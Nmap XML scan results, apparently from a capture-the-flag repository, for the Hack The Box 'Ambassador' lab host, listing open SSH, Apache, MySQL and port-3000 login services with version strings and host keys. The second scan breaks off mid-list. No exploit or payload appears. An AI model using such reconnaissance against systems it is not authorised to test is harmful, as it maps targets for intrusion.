<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-generator" output="Hugo 0.94.2"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script></port>
<port protocol="tcp" portid="3000"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ppp" servicefp="SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(GenericLines,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(GetRequest,174,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:34\x20GMT\r\nContent-Length:\x2029\r\n\r\n&lt;a\x20href=\&quot;/login\&quot;&gt;Found&lt;/a&gt;\.\n\n&quot;)%r(Help,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(HTTPOptions,12E,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\r\n&quot;)%r(RTSPRequest,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Hello,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TerminalServerCookie,67,&quot;HTT
P/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TLSSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLv23SessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa; GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: &#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request&#xa; GetRequest: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:34 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.&#xa; HTTPOptions: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:39 GMT&#xa; Content-Length: 0"><elem key="GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie">&#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request</elem>
<elem key="GetRequest">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:34 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.</elem>
<elem key="HTTPOptions">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:39 GMT&#xa; Content-Length: 0</elem>
</script></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 66&#xa; Capabilities flags: 65535&#xa; Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments&#xa; Status: Autocommit&#xa; Salt: CQA;\x02((\x1DG(\x0E&amp;BtT@27\x0B%&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">66</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>SupportsLoadDataLocal</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>SupportsTransactions</elem>
<elem>ODBCClient</elem>
<elem>Support41Auth</elem>
<elem>SupportsCompression</elem>
<elem>ConnectWithDatabase</elem>
<elem>Speaks41ProtocolOld</elem>
<elem>FoundRows</elem>
<elem>IgnoreSigpipes</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>InteractiveClient</elem>
<elem>LongColumnFlag</elem>
<elem>LongPassword</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>SupportsAuthPlugins</elem>
<elem>SupportsMultipleResults</elem>
<elem>SupportsMultipleStatments</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">CQA;\x02((\x1DG(\x0E&amp;BtT@27\x0B%</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script></port>
</ports>
<times srtt="78461" rttvar="23608" to="172893"/>
</host>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<runstats><finished time="1674563304" timestr="Tue Jan 24 07:28:24 2023" summary="Nmap done at Tue Jan 24 07:28:24 2023; 1 IP address (1 host up) scanned in 335.34 seconds" elapsed="335.34" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,105 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183" start="1674562969" startstr="Tue Jan 24 07:22:49 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200
,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="Connect Scan" time="1674562969"/>
<taskend task="Connect Scan" time="1674562970" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1674562970"/>
<taskend task="Service scan" time="1674563237" extrainfo="4 services on 1 host"/>
<taskbegin task="NSE" time="1674563237"/>
<taskend task="NSE" time="1674563243"/>
<taskbegin task="NSE" time="1674563243"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<host starttime="1674562969" endtime="1674563263"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="996">
<extrareasons reason="conn-refused" count="996" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,52
14,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa 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&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
<elem key="key">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</elem>
<elem key="type">ssh-rsa</elem>
<elem key="bits">3072</elem>
</table>
<table>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-generator" output="Hugo 0.94.2"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script></port>
<port protocol="tcp" portid="3000"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ppp" servicefp="SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(GenericLines,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(GetRequest,174,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22:57\x20GMT\r\nContent-Length:\x2029\r\n\r\n&lt;a\x20href=\&quot;/login\&quot;&gt;Found&lt;/a&gt;\.\n\n&quot;)%r(Help,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(HTTPOptions,12E,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\r\n&quot;)%r(RTSPRequest,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Hello,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TerminalServerCookie,67,&quot;HTT
P/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TLSSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLv23SessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa; GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: &#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request&#xa; GetRequest: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:22:57 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.&#xa; HTTPOptions: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:02 GMT&#xa; Content-Length: 0"><elem key="GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie">&#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request</elem>
<elem key="GetRequest">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:22:57 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.</elem>
<elem key="HTTPOptions">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:02 GMT&#xa; Content-Length: 0</elem>
</script></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 43&#xa; Capabilities flags: 65535&#xa; Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults&#xa; Status: Autocommit&#xa; Salt: \x01g1&#xd;&lt;8\x19#\x08@u6\x18S\x06VdJ&#xd;[&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">43</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>Support41Auth</elem>
<elem>Speaks41ProtocolOld</elem>
